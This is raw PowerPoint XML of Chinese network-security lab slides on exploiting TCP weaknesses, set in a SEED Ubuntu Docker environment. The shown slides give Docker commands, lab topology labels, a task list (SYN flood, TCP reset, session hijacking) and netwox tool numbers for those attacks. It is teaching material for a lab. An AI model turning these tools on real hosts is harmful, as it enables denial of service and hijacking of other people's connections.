                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>     https://wizardforcel.gitbooks.io/scapy-docs/content/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">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76556250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352D8-D87E-456A-9E23-8960211FBF55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>容器的使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8205AEA1-8EC5-42FA-88BC-E2F08867059A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574675" y="1700808"/>
            <a:ext cx="8001000" cy="4464496"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>容器查看</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> –a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，可以看到已有一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>容器创建</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>docker run -it --name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>  --hostname=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>--privileged “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>seedubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>” /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>容器启用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>停止</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>docker start/stop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>容器名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进入容器的命令行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>docker exec –it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>容器名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>删除容器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>实验未完成前不要删除）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>docker rm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>容器名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327751924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8DC606-722E-4719-81BC-07F64BCF242A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实验环境截图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6DB835A-60DB-4707-BF95-B4F18974CE92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="1772815"/>
            <a:ext cx="7776864" cy="4501413"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B62E194-9049-40D7-8EBD-E3320D944B5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915816" y="4509120"/>
            <a:ext cx="1296144" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F8FF0CC-0DCB-48D3-8586-BE31075E3992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6444208" y="3196994"/>
            <a:ext cx="1296144" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击目标（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{408BD7D9-F01A-4480-A863-17824A06FEEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6012160" y="5229200"/>
            <a:ext cx="1296144" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
        <mc:Choice Requires="p14">
          <p:contentPart p14:bwMode="auto" r:id="rId3">
            <p14:nvContentPartPr>
              <p14:cNvPr id="9" name="墨迹 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5C34FEF-7681-4E4B-BC97-AE8953E8A054}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4397747" y="3791403"/>
              <a:ext cx="781560" cy="18360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="9" name="墨迹 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5C34FEF-7681-4E4B-BC97-AE8953E8A054}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4389107" y="3782403"/>
                <a:ext cx="799200" cy="36000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69824074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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实验内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9218" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>SYN-flood攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>TCP重置攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>TCP会话劫持攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>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zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>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netwox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具集</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Netwox是一款非常强大和易用的开源工具包，可以创造任意的TCP/UDP/IP数据报文。Netwox工具包中包含了超过200个不同功能的网络报文生成工具，每个工具都拥有一个特定的编号。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统已经安装</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215073395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netwox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具集</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>netwox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，可以按照关键词搜素想要的工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>76 Syn-flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>78 TCP RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>40 TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话劫持</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>退出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>netwox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netwox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令号 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以查看具体命令的帮助</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3837980460"/>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ags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="REFSHAPE" val="504133660"/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:6640,&quot;width&quot;:12600}"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="主题">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主题">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Template>
  <TotalTime>2393</TotalTime>
  <Words>2328</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>272</Paragraphs>
  <Slides>46</Slides>
  <Notes>9</Notes>
  <HiddenSlides>6</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46</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="59" baseType="lpstr">
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>主题</vt:lpstr>
      <vt:lpstr>1_主题</vt:lpstr>
      <vt:lpstr>实验一 TCP协议漏洞利用实验</vt:lpstr>
      <vt:lpstr>主要内容</vt:lpstr>
      <vt:lpstr>1 实验目的</vt:lpstr>
      <vt:lpstr>2 实验环境</vt:lpstr>
      <vt:lpstr>docker容器的使用</vt:lpstr>
      <vt:lpstr>实验环境截图</vt:lpstr>
      <vt:lpstr>3 实验内容</vt:lpstr>
      <vt:lpstr>netwox工具集</vt:lpstr>
      <vt:lpstr>netwox工具集</vt:lpstr>
      <vt:lpstr>scapy</vt:lpstr>
      <vt:lpstr>TCP SYN-Flood攻击</vt:lpstr>
      <vt:lpstr>TCP SYN-Flooding攻击</vt:lpstr>
      <vt:lpstr>用Scapy进行SYN-Flooding攻击</vt:lpstr>
      <vt:lpstr>C语言编写程序进行攻击</vt:lpstr>
      <vt:lpstr>SYN-Flooding攻击实施</vt:lpstr>
      <vt:lpstr>观察些什么呢？</vt:lpstr>
      <vt:lpstr>针对SYN-Flooding攻击的防范措施</vt:lpstr>
      <vt:lpstr>SYN-Flooding攻击实验任务</vt:lpstr>
      <vt:lpstr>TCP Reset攻击</vt:lpstr>
      <vt:lpstr>TCP Reset攻击</vt:lpstr>
      <vt:lpstr>伪造TCP reset包</vt:lpstr>
      <vt:lpstr>TCP Reset攻击</vt:lpstr>
      <vt:lpstr>wireshark截包设置</vt:lpstr>
      <vt:lpstr>利用scapy手动攻击</vt:lpstr>
      <vt:lpstr>Scapy自动攻击</vt:lpstr>
      <vt:lpstr>TCP Reset攻击截图</vt:lpstr>
      <vt:lpstr>TCP会话劫持攻击</vt:lpstr>
      <vt:lpstr>TCP会话劫持原理</vt:lpstr>
      <vt:lpstr>TCP会话劫持攻击</vt:lpstr>
      <vt:lpstr>wireshark截包</vt:lpstr>
      <vt:lpstr>构造报文</vt:lpstr>
      <vt:lpstr>wireshark截包看发送的报文</vt:lpstr>
      <vt:lpstr>服务器的响应--ls的执行结果</vt:lpstr>
      <vt:lpstr>用scapy进行TCP会话劫持(手动）</vt:lpstr>
      <vt:lpstr>Scapy自动进行会话劫持攻击</vt:lpstr>
      <vt:lpstr>会话劫持后</vt:lpstr>
      <vt:lpstr>正向shell</vt:lpstr>
      <vt:lpstr>反向shell</vt:lpstr>
      <vt:lpstr>TCP反向shell攻击的效果</vt:lpstr>
      <vt:lpstr>Mitnick攻击</vt:lpstr>
      <vt:lpstr>rsh连接</vt:lpstr>
      <vt:lpstr>Mitnick攻击实施</vt:lpstr>
      <vt:lpstr>rsh会话</vt:lpstr>
      <vt:lpstr>rsh会话</vt:lpstr>
      <vt:lpstr>4 实验要求</vt:lpstr>
      <vt:lpstr>参考资料：</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Compan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系统漏洞扫描原理介绍</dc:title>
  <dc:creator>YuanZhi</dc:creator>
  <cp:lastModifiedBy>wer_sec@qq.com</cp:lastModifiedBy>
  <cp:revision>231</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2003-06-23T13:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-08T13:55:35Z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7</vt:r8>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.9584</vt:lpwstr>
  </property>
</Properties>
</file>